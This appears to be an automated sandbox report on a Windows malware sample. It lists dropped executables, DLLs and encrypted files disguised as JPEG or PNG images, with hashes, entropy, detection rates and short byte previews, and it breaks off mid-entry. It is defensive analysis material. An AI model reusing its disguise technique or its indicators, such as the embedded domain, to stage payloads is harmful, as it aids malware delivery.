SHA-512:	85B64F973D09D30747831E3D3C47F35D401AF5DA138BBABDB618638ABB9FC741A60F3C82215C1159E22A03B753AC23D507F2EF39A78002D35B63143757120F6E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\4fkch1\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.99939915978479
Encrypted:	true
SSDEEP:	6144:qiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:V8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	794558DAA325046753E4BC7702F9D820
SHA1:	4247B637E31934E632524A0C1A97448CCEDE0AA7
SHA-256:	D0505B31B01D40F9252A1AF3E65E21D0989A02C7A6370DCC958B47B376BDDAB9
SHA-512:	DD256FF6D4E46329A308C7DDBC88959FAA7E3DDAF60E40D2003750620ACEB086902C60E7E0D45EB39C707D75FDC1D263F9D0517FA07ED9BA7CF933C9F158F038
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..wa."q.2....#B...R..$3br........%&'()456789:CDEF8.210.64.208....."ijstuvwxyz....cavuax.net......3#..............64.208....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\G1f92m\12xy9.exe

Download File

Process:	C:\Program Files (x86)\4fkch1\4fkch1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\G1f92m\log.src

Download File

Process:	C:\Program Files (x86)\4fkch1\4fkch1.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.99995522635569
Encrypted:	true
SSDEEP:	98304:POQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:6o6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	7973C72D3D3787FB0E27A3100FC06498
SHA1:	5AD5E793B063C5AB76B4160A3D11975D7DBF8334
SHA-256:	E587C0ECB0B1647ED20996BAB8BAC5048F1D9D49F7C36238C130BB79EE1F0DA2
SHA-512:	A622A77A4F7FE84A991F1356DD997BE7BFDD414030BB240469513D0E531D91D49E71549B4F4CC3387B316F51874C47FD4A9A1A2E282FC604189FF24A321C84D6
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..L..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\G1f92m\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\4fkch1\4fkch1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516676922488
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/v:9S4+O6P5OeMRrjRy7aPZbm3k8V/v
MD5:	7F361623673A6B5AE832C386450BB4D0
SHA1:	6C4D3C4BA5505161742BADB57874706CFB47173E
SHA-256:	055A5D54C2AB95F1D2ACFBA8EF8D3A37C6E510FD3538AA57CCA7D3C8AD4134EC
SHA-512:	B3B7654A627C78F0FE0CB93873496D548C4CC0D5DA512AA61BAF354E11CDF8444493E353B236EE6FE571E8549443FF1BBB13CDD0248403988AEF23D050C8A0A0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\G1f92m\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\4fkch1\4fkch1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.9993991244425455
Encrypted:	true
SSDEEP:	6144:giACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:n8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	B2BA206B88CA1C0EBEAF08A79936CA45
SHA1:	9091BB23C38F374703D656439796709BEEE02D03
SHA-256:	7E05A3F7719087DF9907408A0D66840B9B24E7B7FE389033CC547C571ED240E4
SHA-512:	2FB5441C87B6D83C7E6651F9721375C62D26F384BF177156F884DC1512771D04AE26FB7231956B55271720587F050B3A4CF23A91C5475B08EE16E2D555CDCEEE
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......P...............................................................7.K.."............................................................}........!1A..wa."q.2....#B...R..$3br........%&'()456789:CDEF8.210.64.208....."ijstuvwxyz....cavuax.net......3#..............64.208....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.067240743211155
Encrypted:	false
SSDEEP:	6:Wqz+RbLTQWwaahywqz+RdTQWwaVqdx9SK3TAn:MRbncRJVR/n
MD5:	FF6D9354842B497B290F2E5509598F49
SHA1:	4759F3F2D488558EBC30D7EF5118C27B74263B2D
SHA-256:	D26FFD662AD136301DB0E27A15447C11530D9BB5F7B2832ABCA227ED2ABB317D
SHA-512:	AF67A7A0266D0BF304761D28A11C561632D5CEB1E5EAD5D6BC2AC7B2DDF41F78FB7C1427CA23C848EF5E11F21CD616A4FFC02BF5401DB6DF6B2C3379DB56FE02
Malicious:	false
Preview:	....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@!n')O)))))))))))))))))))))))))))))))A]]Ycvv....h.1p..].}>`{....rz=r....idt)JFD.d(ao.ooooooooooooooooooooooooooooooo....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@#n')O)))))))))))))))))))))))))))))))A]]Ycvv....h.1p..].}>`{....rz=r....idt)JFD.b(ao.ooooooooooooooooooooooooooooooo....zww5PMP5555555555555555555555555555555555555CFPY6>w=QQ======================================jROY)8=.vskz.T..................................UkUh$...2x}hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\cajXRH.exe
